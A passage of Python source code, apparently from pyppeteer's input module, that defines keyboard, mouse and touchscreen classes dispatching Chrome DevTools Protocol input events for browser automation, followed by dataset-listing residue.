if key == 'Meta':
return 4
if key == 'Shift':
return 8
return 0
def _keyDescriptionForString(self, keyString: str) -> Dict: # noqa: C901
shift = self._modifiers & 8
description = {
'key': '',
'keyCode': 0,
'code': '',
'text': '',
'location': 0,
}
definition: Dict = keyDefinitions.get(keyString) # type: ignore
if not definition:
raise PyppeteerError(f'Unknown key: {keyString}')
if 'key' in definition:
description['key'] = definition['key']
if shift and definition.get('shiftKey'):
description['key'] = definition['shiftKey']
if 'keyCode' in definition:
description['keyCode'] = definition['keyCode']
if shift and definition.get('shiftKeyCode'):
description['keyCode'] = definition['shiftKeyCode']
if 'code' in definition:
description['code'] = definition['code']
if 'location' in definition:
description['location'] = definition['location']
if len(description['key']) == 1: # type: ignore
description['text'] = description['key']
if 'text' in definition:
description['text'] = definition['text']
if shift and definition.get('shiftText'):
description['text'] = definition['shiftText']
if self._modifiers & ~8:
description['text'] = ''
return description
async def up(self, key: str) -> None:
"""Dispatch a ``keyup`` event of the ``key``.
:arg str key: Name of key to release, such as ``ArrowLeft``.
"""
description = self._keyDescriptionForString(key)
self._modifiers &= ~self._modifierBit(description['key'])
if description['code'] in self._pressedKeys:
self._pressedKeys.remove(description['code'])
await self._client.send('Input.dispatchKeyEvent', {
'type': 'keyUp',
'modifiers': self._modifiers,
'key': description['key'],
'windowsVirtualKeyCode': description['keyCode'],
'code': description['code'],
'location': description['location'],
})
async def sendCharacter(self, char: str) -> None:
"""Send character into the page.
This method dispatches a ``keypress`` and ``input`` event. This does
not send a ``keydown`` or ``keyup`` event.
.. note::
Modifier keys DO NOT effect :meth:`sendCharacter`. Holding down
``shift`` will not type the text in upper case.
"""
await self._client.send('Input.insertText', {'text': char})
async def type(self, text: str, options: Dict = None, **kwargs: Any
) -> None:
"""Type characters into a focused element.
This method sends ``keydown``, ``keypress``/``input``, and ``keyup``
event for each character in the ``text``.
To press a special key, like ``Control`` or ``ArrowDown``, use
:meth:`press` method.
:arg str text: Text to type into a focused element.
:arg dict options: Options can have ``delay`` (int|float) field, which
specifies time to wait between key presses in milliseconds. Defaults
to 0.
.. note::
Modifier keys DO NOT effect :meth:`type`. Holding down ``shift``
will not type the text in upper case.
"""
options = merge_dict(options, kwargs)
delay = options.get('delay', 0)
for char in text:
if char in keyDefinitions:
await self.press(char, {'delay': delay})
else:
await self.sendCharacter(char)
if delay:
await asyncio.sleep(delay / 1000)
async def press(self, key: str, options: Dict = None, **kwargs: Any
) -> None:
"""Press ``key``.
If ``key`` is a single character and no modifier keys besides
``Shift`` are being held down, a ``keypress``/``input`` event will also
generated. The ``text`` option can be specified to force an input event
to be generated.
:arg str key: Name of key to press, such as ``ArrowLeft``.
This method accepts the following options:
* ``text`` (str): If specified, generates an input event with this
text.
* ``delay`` (int|float): Time to wait between ``keydown`` and
``keyup``. Defaults to 0.
.. note::
Modifier keys DO effect :meth:`press`. Holding down ``Shift`` will
type the text in upper case.
"""
options = merge_dict(options, kwargs)
await self.down(key, options)
if 'delay' in options:
await asyncio.sleep(options['delay'] / 1000)
await self.up(key)
class Mouse(object):
"""Mouse class.
The :class:`Mouse` operates in main-frame CSS pixels relative to the
top-left corner of the viewport.
"""
def __init__(self, client: CDPSession, keyboard: Keyboard) -> None:
self._client = client
self._keyboard = keyboard
self._x = 0.0
self._y = 0.0
self._button = 'none'
async def move(self, x: float, y: float, options: dict = None,
**kwargs: Any) -> None:
"""Move mouse cursor (dispatches a ``mousemove`` event).
Options can accepts ``steps`` (int) field. If this ``steps`` option
specified, Sends intermediate ``mousemove`` events. Defaults to 1.
"""
options = merge_dict(options, kwargs)
fromX = self._x
fromY = self._y
self._x = x
self._y = y
steps = options.get('steps', 1)
for i in range(1, steps + 1):
x = round(fromX + (self._x - fromX) * (i / steps))
y = round(fromY + (self._y - fromY) * (i / steps))
await self._client.send('Input.dispatchMouseEvent', {
'type': 'mouseMoved',
'button': self._button,
'x': x,
'y': y,
'modifiers': self._keyboard._modifiers,
})
async def click(self, x: float, y: float, options: dict = None,
**kwargs: Any) -> None:
"""Click button at (``x``, ``y``).
Shortcut to :meth:`move`, :meth:`down`, and :meth:`up`.
This method accepts the following options:
* ``button`` (str): ``left``, ``right``, or ``middle``, defaults to
``left``.
* ``clickCount`` (int): defaults to 1.
* ``delay`` (int|float): Time to wait between ``mousedown`` and
``mouseup`` in milliseconds. Defaults to 0.
"""
options = merge_dict(options, kwargs)
await self.move(x, y)
await self.down(options)
if options and options.get('delay'):
await asyncio.sleep(options.get('delay', 0) / 1000)
await self.up(options)
async def down(self, options: dict = None, **kwargs: Any) -> None:
"""Press down button (dispatches ``mousedown`` event).
This method accepts the following options:
* ``button`` (str): ``left``, ``right``, or ``middle``, defaults to
``left``.
* ``clickCount`` (int): defaults to 1.
"""
options = merge_dict(options, kwargs)
self._button = options.get('button', 'left')
await self._client.send('Input.dispatchMouseEvent', {
'type': 'mousePressed',
'button': self._button,
'x': self._x,
'y': self._y,
'modifiers': self._keyboard._modifiers,
'clickCount': options.get('clickCount') or 1,
})
async def up(self, options: dict = None, **kwargs: Any) -> None:
"""Release pressed button (dispatches ``mouseup`` event).
This method accepts the following options:
* ``button`` (str): ``left``, ``right``, or ``middle``, defaults to
``left``.
* ``clickCount`` (int): defaults to 1.
"""
options = merge_dict(options, kwargs)
self._button = 'none'
await self._client.send('Input.dispatchMouseEvent', {
'type': 'mouseReleased',
'button': options.get('button', 'left'),
'x': self._x,
'y': self._y,
'modifiers': self._keyboard._modifiers,
'clickCount': options.get('clickCount') or 1,
})
class Touchscreen(object):
"""Touchscreen class."""
def __init__(self, client: CDPSession, keyboard: Keyboard) -> None:
"""Make new touchscreen object."""
self._client = client
self._keyboard = keyboard
async def tap(self, x: float, y: float) -> None:
"""Tap (``x``, ``y``).
Dispatches a ``touchstart`` and ``touchend`` event.
"""
touchPoints = [{'x': round(x), 'y': round(y)}]
await self._client.send('Input.dispatchTouchEvent', {
'type': 'touchStart',
'touchPoints': touchPoints,
'modifiers': self._keyboard._modifiers,
})
await self._client.send('Input.dispatchTouchEvent', {
'type': 'touchEnd',
'touchPoints': [],
'modifiers': self._keyboard._modifiers,
})
|
[
"streltsov2609@gmail.com"
] |
streltsov2609@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.